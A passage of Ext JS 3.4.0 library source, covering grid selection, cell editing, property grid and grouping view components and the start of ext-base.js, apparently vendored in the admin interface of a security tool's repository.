this.selectAll()
}
}
}, renderer:function (b, c, a) {
return'<div class="x-grid3-row-checker"> </div>'
}, onEditorSelect:function (b, a) {
if (a != b && !this.checkOnly) {
this.selectRow(b)
}
}});
Ext.grid.CellSelectionModel = Ext.extend(Ext.grid.AbstractSelectionModel, {constructor:function (a) {
Ext.apply(this, a);
this.selection = null;
this.addEvents("beforecellselect", "cellselect", "selectionchange");
Ext.grid.CellSelectionModel.superclass.constructor.call(this)
}, initEvents:function () {
this.grid.on("cellmousedown", this.handleMouseDown, this);
this.grid.on(Ext.EventManager.getKeyEvent(), this.handleKeyDown, this);
this.grid.getView().on({scope:this, refresh:this.onViewChange, rowupdated:this.onRowUpdated, beforerowremoved:this.clearSelections, beforerowsinserted:this.clearSelections});
if (this.grid.isEditor) {
this.grid.on("beforeedit", this.beforeEdit, this)
}
}, beforeEdit:function (a) {
this.select(a.row, a.column, false, true, a.record)
}, onRowUpdated:function (a, b, c) {
if (this.selection && this.selection.record == c) {
a.onCellSelect(b, this.selection.cell[1])
}
}, onViewChange:function () {
this.clearSelections(true)
}, getSelectedCell:function () {
return this.selection ? this.selection.cell : null
}, clearSelections:function (b) {
var a = this.selection;
if (a) {
if (b !== true) {
this.grid.view.onCellDeselect(a.cell[0], a.cell[1])
}
this.selection = null;
this.fireEvent("selectionchange", this, null)
}
}, hasSelection:function () {
return this.selection ? true : false
}, handleMouseDown:function (b, d, a, c) {
if (c.button !== 0 || this.isLocked()) {
return
}
this.select(d, a)
}, select:function (g, c, b, e, d) {
if (this.fireEvent("beforecellselect", this, g, c) !== false) {
this.clearSelections();
d = d || this.grid.store.getAt(g);
this.selection = {record:d, cell:[g, c]};
if (!b) {
var a = this.grid.getView();
a.onCellSelect(g, c);
if (e !== true) {
a.focusCell(g, c)
}
}
this.fireEvent("cellselect", this, g, c);
this.fireEvent("selectionchange", this, this.selection)
}
}, isSelectable:function (c, b, a) {
return !a.isHidden(b)
}, onEditorKey:function (b, a) {
if (a.getKey() == a.TAB) {
this.handleKeyDown(a)
}
}, handleKeyDown:function (j) {
if (!j.isNavKeyPress()) {
return
}
var d = j.getKey(), i = this.grid, p = this.selection, b = this, m = function (g, c, e) {
return i.walkCells(g, c, e, i.isEditor && i.editing ? b.acceptsNav : b.isSelectable, b)
}, o, h, a, l, n;
switch (d) {
case j.ESC:
case j.PAGE_UP:
case j.PAGE_DOWN:
break;
default:
j.stopEvent();
break
}
if (!p) {
o = m(0, 0, 1);
if (o) {
this.select(o[0], o[1])
}
return
}
o = p.cell;
a = o[0];
l = o[1];
switch (d) {
case j.TAB:
if (j.shiftKey) {
h = m(a, l - 1, -1)
} else {
h = m(a, l + 1, 1)
}
break;
case j.DOWN:
h = m(a + 1, l, 1);
break;
case j.UP:
h = m(a - 1, l, -1);
break;
case j.RIGHT:
h = m(a, l + 1, 1);
break;
case j.LEFT:
h = m(a, l - 1, -1);
break;
case j.ENTER:
if (i.isEditor && !i.editing) {
i.startEditing(a, l);
return
}
break
}
if (h) {
a = h[0];
l = h[1];
this.select(a, l);
if (i.isEditor && i.editing) {
n = i.activeEditor;
if (n && n.field.triggerBlur) {
n.field.triggerBlur()
}
i.startEditing(a, l)
}
}
}, acceptsNav:function (c, b, a) {
return !a.isHidden(b) && a.isCellEditable(b, c)
}});
Ext.grid.EditorGridPanel = Ext.extend(Ext.grid.GridPanel, {clicksToEdit:2, forceValidation:false, isEditor:true, detectEdit:false, autoEncode:false, trackMouseOver:false, initComponent:function () {
Ext.grid.EditorGridPanel.superclass.initComponent.call(this);
if (!this.selModel) {
this.selModel = new Ext.grid.CellSelectionModel()
}
this.activeEditor = null;
this.addEvents("beforeedit", "afteredit", "validateedit")
}, initEvents:function () {
Ext.grid.EditorGridPanel.superclass.initEvents.call(this);
this.getGridEl().on("mousewheel", this.stopEditing.createDelegate(this, [true]), this);
this.on("columnresize", this.stopEditing, this, [true]);
if (this.clicksToEdit == 1) {
this.on("cellclick", this.onCellDblClick, this)
} else {
var a = this.getView();
if (this.clicksToEdit == "auto" && a.mainBody) {
a.mainBody.on("mousedown", this.onAutoEditClick, this)
}
this.on("celldblclick", this.onCellDblClick, this)
}
}, onResize:function () {
Ext.grid.EditorGridPanel.superclass.onResize.apply(this, arguments);
var a = this.activeEditor;
if (this.editing && a) {
a.realign(true)
}
}, onCellDblClick:function (b, c, a) {
this.startEditing(c, a)
}, onAutoEditClick:function (c, b) {
if (c.button !== 0) {
return
}
var g = this.view.findRowIndex(b), a = this.view.findCellIndex(b);
if (g !== false && a !== false) {
this.stopEditing();
if (this.selModel.getSelectedCell) {
var d = this.selModel.getSelectedCell();
if (d && d[0] === g && d[1] === a) {
this.startEditing(g, a)
}
} else {
if (this.selModel.isSelected(g)) {
this.startEditing(g, a)
}
}
}
}, onEditComplete:function (b, d, a) {
this.editing = false;
this.lastActiveEditor = this.activeEditor;
this.activeEditor = null;
var c = b.record, h = this.colModel.getDataIndex(b.col);
d = this.postEditValue(d, a, c, h);
if (this.forceValidation === true || String(d) !== String(a)) {
var g = {grid:this, record:c, field:h, originalValue:a, value:d, row:b.row, column:b.col, cancel:false};
if (this.fireEvent("validateedit", g) !== false && !g.cancel && String(d) !== String(a)) {
c.set(h, g.value);
delete g.cancel;
this.fireEvent("afteredit", g)
}
}
this.view.focusCell(b.row, b.col)
}, startEditing:function (i, c) {
this.stopEditing();
if (this.colModel.isCellEditable(c, i)) {
this.view.ensureVisible(i, c, true);
var d = this.store.getAt(i), h = this.colModel.getDataIndex(c), g = {grid:this, record:d, field:h, value:d.data[h], row:i, column:c, cancel:false};
if (this.fireEvent("beforeedit", g) !== false && !g.cancel) {
this.editing = true;
var b = this.colModel.getCellEditor(c, i);
if (!b) {
return
}
if (!b.rendered) {
b.parentEl = this.view.getEditorParent(b);
b.on({scope:this, render:{fn:function (e) {
e.field.focus(false, true)
}, single:true, scope:this}, specialkey:function (k, j) {
this.getSelectionModel().onEditorKey(k, j)
}, complete:this.onEditComplete, canceledit:this.stopEditing.createDelegate(this, [true])})
}
Ext.apply(b, {row:i, col:c, record:d});
this.lastEdit = {row:i, col:c};
this.activeEditor = b;
b.selectSameEditor = (this.activeEditor == this.lastActiveEditor);
var a = this.preEditValue(d, h);
b.startEdit(this.view.getCell(i, c).firstChild, Ext.isDefined(a) ? a : "");
(function () {
delete b.selectSameEditor
}).defer(50)
}
}
}, preEditValue:function (a, c) {
var b = a.data[c];
return this.autoEncode && Ext.isString(b) ? Ext.util.Format.htmlDecode(b) : b
}, postEditValue:function (c, a, b, d) {
return this.autoEncode && Ext.isString(c) ? Ext.util.Format.htmlEncode(c) : c
}, stopEditing:function (b) {
if (this.editing) {
var a = this.lastActiveEditor = this.activeEditor;
if (a) {
a[b === true ? "cancelEdit" : "completeEdit"]();
this.view.focusCell(a.row, a.col)
}
this.activeEditor = null
}
this.editing = false
}});
Ext.reg("editorgrid", Ext.grid.EditorGridPanel);
Ext.grid.GridEditor = function (b, a) {
Ext.grid.GridEditor.superclass.constructor.call(this, b, a);
b.monitorTab = false
};
Ext.extend(Ext.grid.GridEditor, Ext.Editor, {alignment:"tl-tl", autoSize:"width", hideEl:false, cls:"x-small-editor x-grid-editor", shim:false, shadow:false});
Ext.grid.PropertyRecord = Ext.data.Record.create([
{name:"name", type:"string"},
"value"
]);
Ext.grid.PropertyStore = Ext.extend(Ext.util.Observable, {constructor:function (a, b) {
this.grid = a;
this.store = new Ext.data.Store({recordType:Ext.grid.PropertyRecord});
this.store.on("update", this.onUpdate, this);
if (b) {
this.setSource(b)
}
Ext.grid.PropertyStore.superclass.constructor.call(this)
}, setSource:function (c) {
this.source = c;
this.store.removeAll();
var b = [];
for (var a in c) {
if (this.isEditableValue(c[a])) {
b.push(new Ext.grid.PropertyRecord({name:a, value:c[a]}, a))
}
}
this.store.loadRecords({records:b}, {}, true)
}, onUpdate:function (e, a, d) {
if (d == Ext.data.Record.EDIT) {
var b = a.data.value;
var c = a.modified.value;
if (this.grid.fireEvent("beforepropertychange", this.source, a.id, b, c) !== false) {
this.source[a.id] = b;
a.commit();
this.grid.fireEvent("propertychange", this.source, a.id, b, c)
} else {
a.reject()
}
}
}, getProperty:function (a) {
return this.store.getAt(a)
}, isEditableValue:function (a) {
return Ext.isPrimitive(a) || Ext.isDate(a)
}, setValue:function (d, c, a) {
var b = this.getRec(d);
if (b) {
b.set("value", c);
this.source[d] = c
} else {
if (a) {
this.source[d] = c;
b = new Ext.grid.PropertyRecord({name:d, value:c}, d);
this.store.add(b)
}
}
}, remove:function (b) {
var a = this.getRec(b);
if (a) {
this.store.remove(a);
delete this.source[b]
}
}, getRec:function (a) {
return this.store.getById(a)
}, getSource:function () {
return this.source
}});
Ext.grid.PropertyColumnModel = Ext.extend(Ext.grid.ColumnModel, {nameText:"Name", valueText:"Value", dateFormat:"m/j/Y", trueText:"true", falseText:"false", constructor:function (c, b) {
var d = Ext.grid, e = Ext.form;
this.grid = c;
d.PropertyColumnModel.superclass.constructor.call(this, [
{header:this.nameText, width:50, sortable:true, dataIndex:"name", id:"name", menuDisabled:true},
{header:this.valueText, width:50, resizable:false, dataIndex:"value", id:"value", menuDisabled:true}
]);
this.store = b;
var a = new e.Field({autoCreate:{tag:"select", children:[
{tag:"option", value:"true", html:this.trueText},
{tag:"option", value:"false", html:this.falseText}
]}, getValue:function () {
return this.el.dom.value == "true"
}});
this.editors = {date:new d.GridEditor(new e.DateField({selectOnFocus:true})), string:new d.GridEditor(new e.TextField({selectOnFocus:true})), number:new d.GridEditor(new e.NumberField({selectOnFocus:true, style:"text-align:left;"})), "boolean":new d.GridEditor(a, {autoSize:"both"})};
this.renderCellDelegate = this.renderCell.createDelegate(this);
this.renderPropDelegate = this.renderProp.createDelegate(this)
}, renderDate:function (a) {
return a.dateFormat(this.dateFormat)
}, renderBool:function (a) {
return this[a ? "trueText" : "falseText"]
}, isCellEditable:function (a, b) {
return a == 1
}, getRenderer:function (a) {
return a == 1 ? this.renderCellDelegate : this.renderPropDelegate
}, renderProp:function (a) {
return this.getPropertyName(a)
}, renderCell:function (d, b, c) {
var a = this.grid.customRenderers[c.get("name")];
if (a) {
return a.apply(this, arguments)
}
var e = d;
if (Ext.isDate(d)) {
e = this.renderDate(d)
} else {
if (typeof d == "boolean") {
e = this.renderBool(d)
}
}
return Ext.util.Format.htmlEncode(e)
}, getPropertyName:function (b) {
var a = this.grid.propertyNames;
return a && a[b] ? a[b] : b
}, getCellEditor:function (a, e) {
var b = this.store.getProperty(e), d = b.data.name, c = b.data.value;
if (this.grid.customEditors[d]) {
return this.grid.customEditors[d]
}
if (Ext.isDate(c)) {
return this.editors.date
} else {
if (typeof c == "number") {
return this.editors.number
} else {
if (typeof c == "boolean") {
return this.editors["boolean"]
} else {
return this.editors.string
}
}
}
}, destroy:function () {
Ext.grid.PropertyColumnModel.superclass.destroy.call(this);
this.destroyEditors(this.editors);
this.destroyEditors(this.grid.customEditors)
}, destroyEditors:function (b) {
for (var a in b) {
Ext.destroy(b[a])
}
}});
Ext.grid.PropertyGrid = Ext.extend(Ext.grid.EditorGridPanel, {enableColumnMove:false, stripeRows:false, trackMouseOver:false, clicksToEdit:1, enableHdMenu:false, viewConfig:{forceFit:true}, initComponent:function () {
this.customRenderers = this.customRenderers || {};
this.customEditors = this.customEditors || {};
this.lastEditRow = null;
var b = new Ext.grid.PropertyStore(this);
this.propStore = b;
var a = new Ext.grid.PropertyColumnModel(this, b);
b.store.sort("name", "ASC");
this.addEvents("beforepropertychange", "propertychange");
this.cm = a;
this.ds = b.store;
Ext.grid.PropertyGrid.superclass.initComponent.call(this);
this.mon(this.selModel, "beforecellselect", function (e, d, c) {
if (c === 0) {
this.startEditing.defer(200, this, [d, 1]);
return false
}
}, this)
}, onRender:function () {
Ext.grid.PropertyGrid.superclass.onRender.apply(this, arguments);
this.getGridEl().addClass("x-props-grid")
}, afterRender:function () {
Ext.grid.PropertyGrid.superclass.afterRender.apply(this, arguments);
if (this.source) {
this.setSource(this.source)
}
}, setSource:function (a) {
this.propStore.setSource(a)
}, getSource:function () {
return this.propStore.getSource()
}, setProperty:function (c, b, a) {
this.propStore.setValue(c, b, a)
}, removeProperty:function (a) {
this.propStore.remove(a)
}});
Ext.reg("propertygrid", Ext.grid.PropertyGrid);
Ext.grid.GroupingView = Ext.extend(Ext.grid.GridView, {groupByText:"Group By This Field", showGroupsText:"Show in Groups", hideGroupedColumn:false, showGroupName:true, startCollapsed:false, enableGrouping:true, enableGroupingMenu:true, enableNoGroups:true, emptyGroupText:"(None)", ignoreAdd:false, groupTextTpl:"{text}", groupMode:"value", cancelEditOnToggle:true, initTemplates:function () {
Ext.grid.GroupingView.superclass.initTemplates.call(this);
this.state = {};
var a = this.grid.getSelectionModel();
a.on(a.selectRow ? "beforerowselect" : "beforecellselect", this.onBeforeRowSelect, this);
if (!this.startGroup) {
this.startGroup = new Ext.XTemplate('<div id="{groupId}" class="x-grid-group {cls}">', '<div id="{groupId}-hd" class="x-grid-group-hd" style="{style}"><div class="x-grid-group-title">', this.groupTextTpl, "</div></div>", '<div id="{groupId}-bd" class="x-grid-group-body">')
}
this.startGroup.compile();
if (!this.endGroup) {
this.endGroup = "</div></div>"
}
}, findGroup:function (a) {
return Ext.fly(a).up(".x-grid-group", this.mainBody.dom)
}, getGroups:function () {
return this.hasRows() ? this.mainBody.dom.childNodes : []
}, onAdd:function (d, a, b) {
if (this.canGroup() && !this.ignoreAdd) {
var c = this.getScrollState();
this.fireEvent("beforerowsinserted", d, b, b + (a.length - 1));
this.refresh();
this.restoreScroll(c);
this.fireEvent("rowsinserted", d, b, b + (a.length - 1))
} else {
if (!this.canGroup()) {
Ext.grid.GroupingView.superclass.onAdd.apply(this, arguments)
}
}
}, onRemove:function (e, a, b, d) {
Ext.grid.GroupingView.superclass.onRemove.apply(this, arguments);
var c = document.getElementById(a._groupId);
if (c && c.childNodes[1].childNodes.length < 1) {
Ext.removeNode(c)
}
this.applyEmptyText()
}, refreshRow:function (a) {
if (this.ds.getCount() == 1) {
this.refresh()
} else {
this.isUpdating = true;
Ext.grid.GroupingView.superclass.refreshRow.apply(this, arguments);
this.isUpdating = false
}
}, beforeMenuShow:function () {
var c, a = this.hmenu.items, b = this.cm.config[this.hdCtxIndex].groupable === false;
if ((c = a.get("groupBy"))) {
c.setDisabled(b)
}
if ((c = a.get("showGroups"))) {
c.setDisabled(b);
c.setChecked(this.canGroup(), true)
}
}, renderUI:function () {
var a = Ext.grid.GroupingView.superclass.renderUI.call(this);
if (this.enableGroupingMenu && this.hmenu) {
this.hmenu.add("-", {itemId:"groupBy", text:this.groupByText, handler:this.onGroupByClick, scope:this, iconCls:"x-group-by-icon"});
if (this.enableNoGroups) {
this.hmenu.add({itemId:"showGroups", text:this.showGroupsText, checked:true, checkHandler:this.onShowGroupsClick, scope:this})
}
this.hmenu.on("beforeshow", this.beforeMenuShow, this)
}
return a
}, processEvent:function (b, i) {
Ext.grid.GroupingView.superclass.processEvent.call(this, b, i);
var h = i.getTarget(".x-grid-group-hd", this.mainBody);
if (h) {
var g = this.getGroupField(), d = this.getPrefix(g), a = h.id.substring(d.length), c = new RegExp("gp-" + Ext.escapeRe(g) + "--hd");
a = a.substr(0, a.length - 3);
if (a || c.test(h.id)) {
this.grid.fireEvent("group" + b, this.grid, g, a, i)
}
if (b == "mousedown" && i.button == 0) {
this.toggleGroup(h.parentNode)
}
}
}, onGroupByClick:function () {
var a = this.grid;
this.enableGrouping = true;
a.store.groupBy(this.cm.getDataIndex(this.hdCtxIndex));
a.fireEvent("groupchange", a, a.store.getGroupState());
this.beforeMenuShow();
this.refresh()
}, onShowGroupsClick:function (a, b) {
this.enableGrouping = b;
if (b) {
this.onGroupByClick()
} else {
this.grid.store.clearGrouping();
this.grid.fireEvent("groupchange", this, null)
}
}, toggleRowIndex:function (c, a) {
if (!this.canGroup()) {
return
}
var b = this.getRow(c);
if (b) {
this.toggleGroup(this.findGroup(b), a)
}
}, toggleGroup:function (c, b) {
var a = Ext.get(c), d = Ext.util.Format.htmlEncode(a.id);
b = Ext.isDefined(b) ? b : a.hasClass("x-grid-group-collapsed");
if (this.state[d] !== b) {
if (this.cancelEditOnToggle !== false) {
this.grid.stopEditing(true)
}
this.state[d] = b;
a[b ? "removeClass" : "addClass"]("x-grid-group-collapsed")
}
}, toggleAllGroups:function (c) {
var b = this.getGroups();
for (var d = 0, a = b.length; d < a; d++) {
this.toggleGroup(b[d], c)
}
}, expandAllGroups:function () {
this.toggleAllGroups(true)
}, collapseAllGroups:function () {
this.toggleAllGroups(false)
}, getGroup:function (a, e, i, j, b, h) {
var c = this.cm.config[b], d = i ? i.call(c.scope, a, {}, e, j, b, h) : String(a);
if (d === "" || d === " ") {
d = c.emptyGroupText || this.emptyGroupText
}
return d
}, getGroupField:function () {
return this.grid.store.getGroupState()
}, afterRender:function () {
if (!this.ds || !this.cm) {
return
}
Ext.grid.GroupingView.superclass.afterRender.call(this);
if (this.grid.deferRowRender) {
this.updateGroupWidths()
}
}, afterRenderUI:function () {
Ext.grid.GroupingView.superclass.afterRenderUI.call(this);
if (this.enableGroupingMenu && this.hmenu) {
this.hmenu.add("-", {itemId:"groupBy", text:this.groupByText, handler:this.onGroupByClick, scope:this, iconCls:"x-group-by-icon"});
if (this.enableNoGroups) {
this.hmenu.add({itemId:"showGroups", text:this.showGroupsText, checked:true, checkHandler:this.onShowGroupsClick, scope:this})
}
this.hmenu.on("beforeshow", this.beforeMenuShow, this)
}
}, renderRows:function () {
var a = this.getGroupField();
var e = !!a;
if (this.hideGroupedColumn) {
var b = this.cm.findColumnIndex(a), d = Ext.isDefined(this.lastGroupField);
if (!e && d) {
this.mainBody.update("");
this.cm.setHidden(this.cm.findColumnIndex(this.lastGroupField), false);
delete this.lastGroupField
} else {
if (e && !d) {
this.lastGroupField = a;
this.cm.setHidden(b, true)
} else {
if (e && d && a !== this.lastGroupField) {
this.mainBody.update("");
var c = this.cm.findColumnIndex(this.lastGroupField);
this.cm.setHidden(c, false);
this.lastGroupField = a;
this.cm.setHidden(b, true)
}
}
}
}
return Ext.grid.GroupingView.superclass.renderRows.apply(this, arguments)
}, doRender:function (c, h, q, a, p, s) {
if (h.length < 1) {
return""
}
if (!this.canGroup() || this.isUpdating) {
return Ext.grid.GroupingView.superclass.doRender.apply(this, arguments)
}
var z = this.getGroupField(), o = this.cm.findColumnIndex(z), w, j = "width:" + this.getTotalWidth() + ";", e = this.cm.config[o], b = e.groupRenderer || e.renderer, t = this.showGroupName ? (e.groupName || e.header) + ": " : "", y = [], l, u, v, n;
for (u = 0, v = h.length; u < v; u++) {
var k = a + u, m = h[u], d = m.data[z];
w = this.getGroup(d, m, b, k, o, q);
if (!l || l.group != w) {
n = this.constructId(d, z, o);
this.state[n] = !(Ext.isDefined(this.state[n]) ? !this.state[n] : this.startCollapsed);
l = {group:w, gvalue:d, text:t + w, groupId:n, startRow:k, rs:[m], cls:this.state[n] ? "" : "x-grid-group-collapsed", style:j};
y.push(l)
} else {
l.rs.push(m)
}
m._groupId = n
}
var x = [];
for (u = 0, v = y.length; u < v; u++) {
w = y[u];
this.doGroupStart(x, w, c, q, p);
x[x.length] = Ext.grid.GroupingView.superclass.doRender.call(this, c, w.rs, q, w.startRow, p, s);
this.doGroupEnd(x, w, c, q, p)
}
return x.join("")
}, getGroupId:function (a) {
var b = this.getGroupField();
return this.constructId(a, b, this.cm.findColumnIndex(b))
}, constructId:function (c, e, a) {
var b = this.cm.config[a], d = b.groupRenderer || b.renderer, g = (this.groupMode == "value") ? c : this.getGroup(c, {data:{}}, d, 0, a, this.ds);
return this.getPrefix(e) + Ext.util.Format.htmlEncode(g)
}, canGroup:function () {
return this.enableGrouping && !!this.getGroupField()
}, getPrefix:function (a) {
return this.grid.getGridEl().id + "-gp-" + a + "-"
}, doGroupStart:function (a, d, b, e, c) {
a[a.length] = this.startGroup.apply(d)
}, doGroupEnd:function (a, d, b, e, c) {
a[a.length] = this.endGroup
}, getRows:function () {
if (!this.canGroup()) {
return Ext.grid.GroupingView.superclass.getRows.call(this)
}
var k = [], c = this.getGroups(), h, e = 0, a = c.length, d, b;
for (; e < a; ++e) {
h = c[e].childNodes[1];
if (h) {
h = h.childNodes;
for (d = 0, b = h.length; d < b; ++d) {
k[k.length] = h[d]
}
}
}
return k
}, updateGroupWidths:function () {
if (!this.canGroup() || !this.hasRows()) {
return
}
var c = Math.max(this.cm.getTotalWidth(), this.el.dom.offsetWidth - this.getScrollOffset()) + "px";
var b = this.getGroups();
for (var d = 0, a = b.length; d < a; d++) {
b[d].firstChild.style.width = c
}
}, onColumnWidthUpdated:function (c, a, b) {
Ext.grid.GroupingView.superclass.onColumnWidthUpdated.call(this, c, a, b);
this.updateGroupWidths()
}, onAllColumnWidthsUpdated:function (a, b) {
Ext.grid.GroupingView.superclass.onAllColumnWidthsUpdated.call(this, a, b);
this.updateGroupWidths()
}, onColumnHiddenUpdated:function (b, c, a) {
Ext.grid.GroupingView.superclass.onColumnHiddenUpdated.call(this, b, c, a);
this.updateGroupWidths()
}, onLayout:function () {
this.updateGroupWidths()
}, onBeforeRowSelect:function (b, a) {
this.toggleRowIndex(a, true)
}});
Ext.grid.GroupingView.GROUP_ID = 1000; |
JavaScript | beef/extensions/admin_ui/media/javascript/ext-base.js | /*
* Ext JS Library 3.4.0
* Copyright(c) 2006-2011 Sencha Inc.
* [email protected]
* http://www.sencha.com/license
*/
window.undefined=window.undefined;Ext={version:"3.4.0",versionDetail:{major:3,minor:4,patch:0}};Ext.apply=function(d,e,b){if(b){Ext.apply(d,b)}if(d&&e&&typeof e=="object"){for(var a in e){d[a]=e[a]}}return d};(function(){var g=0,u=Object.prototype.toString,v=navigator.userAgent.toLowerCase(),A=function(e){return e.test(v)},i=document,n=i.documentMode,l=i.compatMode=="CSS1Compat",C=A(/opera/),h=A(/\bchrome\b/),w=A(/webkit/),z=!h&&A(/safari/),f=z&&A(/applewebkit\/4/),b=z&&A(/version\/3/),D=z&&A(/version\/4/),t=!C&&A(/msie/),r=t&&(A(/msie 7/)||n==7),q=t&&(A(/msie 8/)&&n!=7),p=t&&A(/msie 9/),s=t&&!r&&!q&&!p,o=!w&&A(/gecko/),d=o&&A(/rv:1\.8/),a=o&&A(/rv:1\.9/),x=t&&!l,B=A(/windows|win32/),k=A(/macintosh|mac os x/),j=A(/adobeair/),m=A(/linux/),c=/^https/i.test(window.location.protocol);if(s){try{i.execCommand("BackgroundImageCache",false,true)}catch(y){}}Ext.apply(Ext,{SSL_SECURE_URL:c&&t?'javascript:""':"about:blank",isStrict:l,isSecure:c,isReady:false,enableForcedBoxModel:false,enableGarbageCollector:true,enableListenerCollection:false,enableNestedListenerRemoval:false,USE_NATIVE_JSON:false,applyIf:function(E,F){if(E){for(var e in F){if(!Ext.isDefined(E[e])){E[e]=F[e]}}}return E},id:function(e,E){e=Ext.getDom(e,true)||{};if(!e.id){e.id=(E||"ext-gen")+(++g)}return e.id},extend:function(){var E=function(G){for(var F in G){this[F]=G[F]}};var e=Object.prototype.constructor;return function(L,I,K){if(typeof I=="object"){K=I;I=L;L=K.constructor!=e?K.constructor:function(){I.apply(this,arguments)}}var H=function(){},J,G=I.prototype;H.prototype=G;J=L.prototype=new H();J.constructor=L;L.superclass=G;if(G.constructor==e){G.constructor=I}L.override=function(F){Ext.override(L,F)};J.superclass=J.supr=(function(){return G});J.override=E;Ext.override(L,K);L.extend=function(F){return Ext.extend(L,F)};return L}}(),override:function(e,F){if(F){var E=e.prototype;Ext.apply(E,F);if(Ext.isIE&&F.hasOwnProperty("toString")){E.toString=F.toString}}},namespace:function(){var G=arguments.length,H=0,E,F,e,J,I,K;for(;H<G;++H){e=arguments[H];J=arguments[H].split(".");K=window[J[0]];if(K===undefined){K=window[J[0]]={}}I=J.slice(1);E=I.length;for(F=0;F<E;++F){K=K[I[F]]=K[I[F]]||{}}}return K},urlEncode:function(I,H){var F,E=[],G=encodeURIComponent;Ext.iterate(I,function(e,J){F=Ext.isEmpty(J);Ext.each(F?e:J,function(K){E.push("&",G(e),"=",(!Ext.isEmpty(K)&&(K!=e||!F))?(Ext.isDate(K)?Ext.encode(K).replace(/"/g,""):G(K)):"")})});if(!H){E.shift();H=""}return H+E.join("")},urlDecode:function(F,E){if(Ext.isEmpty(F)){return{}}var I={},H=F.split("&"),J=decodeURIComponent,e,G;Ext.each(H,function(K){K=K.split("=");e=J(K[0]);G=J(K[1]);I[e]=E||!I[e]?G:[].concat(I[e]).concat(G)});return I},urlAppend:function(e,E){if(!Ext.isEmpty(E)){return e+(e.indexOf("?")===-1?"?":"&")+E}return e},toArray:function(){return t?function(F,I,G,H){H=[];for(var E=0,e=F.length;E<e;E++){H.push(F[E])}return H.slice(I||0,G||H.length)}:function(e,F,E){return Array.prototype.slice.call(e,F||0,E||e.length)}}(),isIterable:function(e){if(Ext.isArray(e)||e.callee){return true}if(/NodeList|HTMLCollection/.test(u.call(e))){return true}return((typeof e.nextNode!="undefined"||e.item)&&Ext.isNumber(e.length))},each:function(H,G,F){if(Ext.isEmpty(H,true)){return}if(!Ext.isIterable(H)||Ext.isPrimitive(H)){H=[H]}for(var E=0,e=H.length;E<e;E++){if(G.call(F||H[E],H[E],E,H)===false){return E}}},iterate:function(F,E,e){if(Ext.isEmpty(F)){return}if(Ext.isIterable(F)){Ext.each(F,E,e);return}else{if(typeof F=="object"){for(var G in F){if(F.hasOwnProperty(G)){if(E.call(e||F,G,F[G],F)===false){return}}}}}},getDom:function(F,E){if(!F||!i){return null}if(F.dom){return F.dom}else{if(typeof F=="string"){var G=i.getElementById(F);if(G&&t&&E){if(F==G.getAttribute("id")){return G}else{return null}}return G}else{return F}}},getBody:function(){return Ext.get(i.body||i.documentElement)},getHead:function(){var e;return function(){if(e==undefined){e=Ext.get(i.getElementsByTagName("head")[0])}return e}}(),removeNode:t&&!q?function(){var e;return function(E){if(E&&E.tagName!="BODY"){(Ext.enableNestedListenerRemoval)?Ext.EventManager.purgeElement(E,true):Ext.EventManager.removeAll(E);e=e||i.createElement("div");e.appendChild(E);e.innerHTML="";delete Ext.elCache[E.id]}}}():function(e){if(e&&e.parentNode&&e.tagName!="BODY"){(Ext.enableNestedListenerRemoval)?Ext.EventManager.purgeElement(e,true):Ext.EventManager.removeAll(e);e.parentNode.removeChild(e);delete Ext.elCache[e.id]}},isEmpty:function(E,e){return E===null||E===undefined||((Ext.isArray(E)&&!E.length))||(!e?E==="":false)},isArray:function(e){return u.apply(e)==="[object Array]"},isDate:function(e){return u.apply(e)==="[object Date]"},isObject:function(e){return !!e&&Object.prototype.toString.call(e)==="[object Object]"},isPrimitive:function(e){return Ext.isString(e)||Ext.isNumber(e)||Ext.isBoolean(e)},isFunction:function(e){return u.apply(e)==="[object Function]"},isNumber:function(e){return typeof e==="number"&&isFinite(e)},isString:function(e){return typeof e==="string"},isBoolean:function(e){return typeof e==="boolean"},isElement:function(e){return e?!!e.tagName:false},isDefined:function(e){return typeof e!=="undefined"},isOpera:C,isWebKit:w,isChrome:h,isSafari:z,isSafari3:b,isSafari4:D,isSafari2:f,isIE:t,isIE6:s,isIE7:r,isIE8:q,isIE9:p,isGecko:o,isGecko2:d,isGecko3:a,isBorderBox:x,isLinux:m,isWindows:B,isMac:k,isAir:j});Ext.ns=Ext.namespace})();Ext.ns("Ext.util","Ext.lib","Ext.data","Ext.supports");Ext.elCache={};Ext.apply(Function.prototype,{createInterceptor:function(b,a){var c=this;return !Ext.isFunction(b)?this:function(){var e=this,d=arguments;b.target=e;b.method=c;return(b.apply(a||e||window,d)!==false)?c.apply(e||window,d):null}},createCallback:function(){var a=arguments,b=this;return function(){return b.apply(window,a)}},createDelegate:function(c,b,a){var d=this;return function(){var f=b||arguments;if(a===true){f=Array.prototype.slice.call(arguments,0);f=f.concat(b)}else{if(Ext.isNumber(a)){f=Array.prototype.slice.call(arguments,0);var e=[a,0].concat(b);Array.prototype.splice.apply(f,e)}}return d.apply(c||window,f)}},defer:function(c,e,b,a){var d=this.createDelegate(e,b,a);if(c>0){return setTimeout(d,c)}d();return 0}});Ext.applyIf(String,{format:function(b){var a=Ext.toArray(arguments,1);return b.replace(/\{(\d+)\}/g,function(c,d){return a[d]})}});Ext.applyIf(Array.prototype,{indexOf:function(b,c){var a=this.length;c=c||0;c+=(c<0)?a:0;for(;c<a;++c){if(this[c]===b){return c}}return -1},remove:function(b){var a=this.indexOf(b);if(a!=-1){this.splice(a,1)}return this}});Ext.util.TaskRunner=function(e){e=e||10;var f=[],a=[],b=0,g=false,d=function(){g=false;clearInterval(b);b=0},h=function(){if(!g){g=true;b=setInterval(i,e)}},c=function(j){a.push(j);if(j.onStop){j.onStop.apply(j.scope||j)}},i=function(){var l=a.length,n=new Date().getTime();if(l>0){for(var p=0;p<l;p++){f.remove(a[p])}a=[];if(f.length<1){d();return}}for(var p=0,o,k,m,j=f.length;p<j;++p){o=f[p];k=n-o.taskRunTime;if(o.interval<=k){m=o.run.apply(o.scope||o,o.args||[++o.taskRunCount]);o.taskRunTime=n;if(m===false||o.taskRunCount===o.repeat){c(o);return}}if(o.duration&&o.duration<=(n-o.taskStartTime)){c(o)}}};this.start=function(j){f.push(j);j.taskStartTime=new Date().getTime();j.taskRunTime=0;j.taskRunCount=0;h();return j};this.stop=function(j){c(j);return j};this.stopAll=function(){d();for(var k=0,j=f.length;k<j;k++){if(f[k].onStop){f[k].onStop()}}f=[];a=[]}};Ext.TaskMgr=new Ext.util.TaskRunner();(function(){var b;function c(d){if(!b){b=new Ext.Element.Flyweight()}b.dom=d;return b}(function(){var 